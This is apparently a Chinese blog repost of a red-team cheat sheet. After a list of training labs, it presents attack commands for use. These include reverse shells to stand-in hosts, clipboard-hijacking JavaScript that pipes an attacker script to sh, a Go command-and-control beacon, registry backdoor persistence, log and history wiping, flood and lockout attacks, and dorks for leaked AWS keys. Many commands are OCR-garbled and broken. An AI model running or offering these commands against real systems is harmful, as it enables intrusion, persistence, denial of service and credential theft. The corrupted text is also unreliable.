对红蓝队都很有价值的技战术、工具分享——Red-Teaming-TTPs
作者:Sec-Labs | 发布时间:
💥免费在线实验室
· Academy Hackaflag BR - https://hackaflag.com.br/
· Attack-Defense - https://attackdefense.com
· Alert to win - https://alf.nu/alert1
· CTF Komodo Security - https://ctf.komodosec.com
· CMD Challenge - https://cmdchallenge.com
· Explotation Education - https://exploit.education
· Google CTF - https://lnkd.in/e46drbz8
· HackTheBox - https://www.hackthebox.com
· Hackthis - https://www.hackthis.co.uk
· Hacksplaining - https://lnkd.in/eAB5CSTA
· Hacker101 - https://ctf.hacker101.com
· Hacker Security - https://lnkd.in/ex7R-C-e
· Hacking-Lab - https://hacking-lab.com/
· HSTRIKE - https://hstrike.com
· ImmersiveLabs - https://immersivelabs.com
· NewbieContest - https://lnkd.in/ewBk6fU5
· OverTheWire - http://overthewire.org
· Practical Pentest Labs - https://lnkd.in/esq9Yuv5
· Pentestlab - https://pentesterlab.com
· Penetration Testing Practice Labs - https://lnkd.in/e6wVANYd
· PentestIT LAB - https://lab.pentestit.ru
· PicoCTF - https://picoctf.com
· PWNABLE - https://lnkd.in/eMEwBJzn
· Root-Me - https://www.root-me.org
· Root in Jail - http://rootinjail.com
· SANS Challenger - https://lnkd.in/e5TAMawK
· SmashTheStack - https://lnkd.in/eVn9rP9p
· The Cryptopals Crypto Challenges - https://cryptopals.com
· Try Hack Me - https://tryhackme.com
· Vulnhub - https://www.vulnhub.com
· W3Challs - https://w3challs.com
· WeChall - http://www.wechall.net
· Zenk-Security - https://lnkd.in/ewJ5rNx2Linux系统枚举/后期利用
id
w
who -a
last -a
ps -ef
df -h
uname -a
mount
cat /etc/issue
cat /etc/release
cat /proc/versionLinux 杂项命令 / 掩饰痕迹
chattr (+/-)i file
unset HISTFILE
unset HISTFILESIZE
unset HISTSIZE
echo "" /var/log/auth.log
echo '''' -/.bash history
kill -9 $$
ln /dev/null -/.bash_historj -sfFork阻断服务攻击
:(){:I: &I;:TCPDUMP监控流量
tcpdump -i ethO -XX -w out.pcap
tcpdump -i ethO port XX dst X.X.X.XWindows系统列举
ver
sc query state=all
tasklist /svc
tasklist /m
tasklist /S ip /v
taskkill /PID pid /F
systeminfo /S ip /U domain\user /P Pwd
dir /a /s /b c:\'.pdf'
dir /a /b c:\windows\kb'
findstr /si password' .txt I •.xmll •.xls tree /F /A c:\ tree.txt
reg save HKLl~\Security security.hive echo %USERNAl~E%启动RDP
reg add "HKEY LOCAL t1ACHINE\SYSTEH\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
(Tunnel RDP through port 443) REG ADD "HKLM\System\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /fPowerShell 枚举
Get-WmiObject -class win32 operatingsjstem I select -property 1 csv c:\os.txt
Get-Service I where object {$ .status -eq ''Running''}
(new-object sjstem.net.webclient) .downloadFile(''url'',''dest'')
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $Host.UI.PromptForCredential( 11 title ", 11 message 11 1 11 user" 11 domain")
powershell.exe Send-l-1ai1Hessage -to " email " -from " email " -subject "Subject11 -a " attachment file path " -body "Body" -SmtpServer Target Email Server IPPowerShell启动Meterpreter有效载荷
- msfvenom -p Wlndows/meterpreter/reverse https -f psh -a x86 LHOST=l.l.l.l LPORT=443 audit.ps1
- Move audit.ps1 into same folder as encodeMeterpreter.ps1
- Launch Powershell (x86)
- powershell.exe -executionpolicy bypass encodeMeterpreter.ps1
- Copy the encoded Meterpreter string
Windows用户锁定
@echo T est run:
for /f %%U in (list.txt) do @for /1 %%C in (1,1,5) do @echo net use \\WIN- 1234\c$ /USER:%%U wrongpassWindows DHCP耗尽
for /L %i in (2,1,254) do (netsh interface ip set address local static
1.1.1.%i netrnask gw I~ %1 ping 12-.0.0.1 -n l -w 10000 nul %1)平滑重启
for /L %i in (2,1,254) do shutdown /r /m \\l.l.l.%i /f /t 0 /c "Reboot
message''TTL指纹识别
Windows : 128
Linux : 64
Network : 255
Solaris : 255XSS测试
在所有输入字段上使用这个字符串,并识别过滤后剩下的XSS攻击。
'';!--"<XSS>=&{()}Cisco IOS 11.2 - 12.2 漏洞
http://ip/level/16-99/exec/show/config通过非交互式shell的FTP
echo open ip 21 ftp.txt
echo user
echo pass
echo bin
echo GET file=tp.txt echo bfe ftp.txt
ftp -s:ftp.txtNetCat监听
nc 10.0.0.1 1234 -e /bin/sh Linux reverse shell
nc 10.0.0.1 1234 -e cmd.exe Windows reverse shellPython反弹shell
python -c 'import socket,subprocess,os; s=socket.socket(socket..;;F_INET, socket.SOCK_STREAL1); s.connect( ("10.0.0.1",1234)); os.dup2 (s.fileno() ,0); os.dup2(s.fileno(l,1); os.dup2(s.file:oo(),2);
p~subprocess.call( 1"/bin/sh","-i"] I;'Bash反弹shell
bash -i & /dev/tcp/10.0.0.1/8080 0 &1Windows 持久性
1. REG add HKEY CURRENT USER\Software\l1icrosoft\W indows\CurrentV ersion\Run /v firewall 7t REG SZ /d "c:\windows\system32\backdoor.exe" /f
2. at 19:00 /every:t1,T,W,Th,F cmd /c start "%USERPROFILE%\backdoor.exe"
3. SCHTASKS /Create /RU "SYSTEt1" /SC l1INUTE /t10 45 /TN FIREWALL /TR
"%USERPROFILE%\backdoor.exe" /ED 12/12/2012HPING3 DoS
hping3 targetiP --flood --frag --spoof ip --destport # --synHydra暴力破解
hydra -1 ftp -P words -v targetiP ftp下载HTTP文件并执行
#!/usr/bin/python import urllib2, os
urls = [11 1.1.1.1'',"2.2.2.2"] port = 11 80"
payload = "cb.sh"
for url in urls:
u = "http://%s:%s/%s" % (url, port, payload) try:
r = urllib2.urlopen(u)
wfile = open{"/tmp/cb.sh", "wb") wfile.write(r.read()) wfile.close ()
break
except: continue
if os.path.exists("/tmp/cb.sh"): os.system("chmod -oo /tmp/cb.sh") os. system ("/tmp/cb. sh")Hashcat
DICTIONARY ATTACK
hashcat -a 0 -m #type hash.txt
DICTIONARY + RULES ATTACK
hashcat -a 0 -m #type hash.txt
COMBINATION ATTACK
hashcat -a 1 -m #type hash.txt
MASK ATTACK
hashcat -a 3 -m #type hash.txt
HYBRID DICTIONARY + MASK
hashcat -a 6 -m #type hash.txt
HYBRID MASK + DICTIONARY
hashcat -a 7 -m #type hash.txt
dict.txt
dict.txt -r rule.txt
dict1.txt dict2.txt
?a?a?a?a?a?a
dict.txt ?a?a?a?a
?a?a?a?a dict.txt恶意的Javascript
<script>
document.getElementById('copy').addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'curl http://attacker-domain:8000/shell.sh | sh\n'); e.preventDefault(); });
</script>在Golang中执行无文件脚本
package main
import (
"io/ioutil"
"net/http"
"os/exec"
"time"
)
func main() {
for {
url := "http://my_command_control:8080/executeThisScript" // Download your bash script
resp, _ := http.Get(string(url))
defer resp.Body.Close()
shellScriptBody, _ := ioutil.ReadAll(resp.Body) // keep in memory
cmd := exec.Command("/bin/bash", "-c", string(shellScriptBody))
cmd.Start() // run in background
time.Sleep(5000) // wait for the next beaconing
}
}Golang反弹shell
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;http://cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.go用IPInfo列举IP
{
"ip": "54.90.107.240",
"hostname": "ec2-54-90-107-240.compute-1.amazonaws.com",
"city": "Virginia Beach",
"region": "Virginia",
"country": "US",
"loc": "36.8512,-76.1692",
"org": "AS14618 Amazon.com, Inc.",
"postal": "23465",
"readme": "https://ipinfo.io/missingauth"
}你也可以利用https://cybergordon.com/,检查IP的信誉!
电子邮件侦察
curl emailrep.io/john.smith@gmail.com
{
"email": "john.smith@gmail.com",
"reputation": "high",
"suspicious": false,
"references": 91,
"details": {
"blacklisted": false,
"malicious_activity": false,
"malicious_activity_recent": false,
"credentials_leaked": true,
"credentials_leaked_recent": false,
"data_breach": true,
"last_seen": "07/27/2019",
"domain_exists": true,
"domain_reputation": "n/a",
"new_domain": false,
"days_since_domain_creation": 8773,
"suspicious_tld": false,
"spam": false,
"free_provider": true,
"disposable": false,
"deliverable": true,
"accept_all": false,
"valid_mx": true,
"spoofable": true,
"spf_strict": true,
"dmarc_enforced": false,
"profiles": [
"lastfm",
"pinterest",
"foursquare",
"aboutme",
"spotify",
"twitter",
"vimeo"
]
}
}nrich IP枚举
一个命令行工具,用于快速分析文件中的所有IP,并查看哪些IP有开放的端口/漏洞。还可以从stdin输入数据,用于数据管道。
安装
$ wget https://gitlab.com/api/v4/projects/33695681/packages/generic/nrich/latest/nrich_latest_amd64.deb
$ sudo dpkg -i nrich_latest_amd64.deb确认
$ echo 149.202.182.140 | nrich -
149.202.182.140 (ftptech1.pcsoft.fr)
Ports: 21, 80, 111, 443
CPEs: cpe:/a:proftpd:proftpd:1.3.5b, cpe:/a:apache:http_server:2.4.25
Vulnerabilities: CVE-2018-11763, CVE-2019-0220, CVE-2017-15710, CVE-2018-1312, CVE-2019-0197, CVE-2017-9798, CVE-2018-1283, CVE-2017-7668, CVE-2017-3169, CVE-2017-15715, CVE-2017-7659, CVE-2018-1333, CVE-2019-0211, CVE-2019-12815, CVE-2017-3167, CVE-2017-9788, CVE-2019-0196, CVE-2017-7679, CVE-2018-17199用例
$ nrich --help
nrich 0.1.0
Add network information to IPs
USAGE:
nrich [OPTIONS] <filename>
FLAGS:
-h, --help Prints help information
-V, --version Prints version information
OPTIONS:
-o, --output <output> Output format (shell or json) [default: shell]
ARGS:
<filename> File containing an IP per line. Non-IPs are ignored使用Python列举匿名FTP登录
#!/usr/bin/python3
from ftplib import FTP
import sys
ips = open(sys.argv[1], 'r')
r = ips.readlines()
for item in r:
item = item.strip()
print("[+] Connecting to: %s \n" %item)
try:
ftp = FTP(item, timeout=3)
ftp.login()
if ftp.retrlines('LIST') != 0:
print("[+] Anonymous login enabled on Host: %s \n" %item)
print("="*70+"\n")
except:
print("[+] Unable to Connect to Host: %s\n" %item)
print("="*70+"\n")- 用例:
python3 FTPLoginChecker.py ip_addresses.txt - 注:使用shodan_eye.py来搜索启用了
anon登录的FTP服务器。 - 搜索关键词 :
230 anonymous
Python反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'云上
AWS
Shodan.io查询列举AWS实例元数据服务访问情况
/latest/meta-data/iam/security-credentialsGoogle Dorking获取AWS访问密钥
inurl:pastebin "AWS_ACCESS_KEY"Google Dorking S3日志
s3 site:amazonaws.com filetype:log
项目地址
https://github.com/RoseSecurity/Red-Teaming-TTPs
标签:学习笔记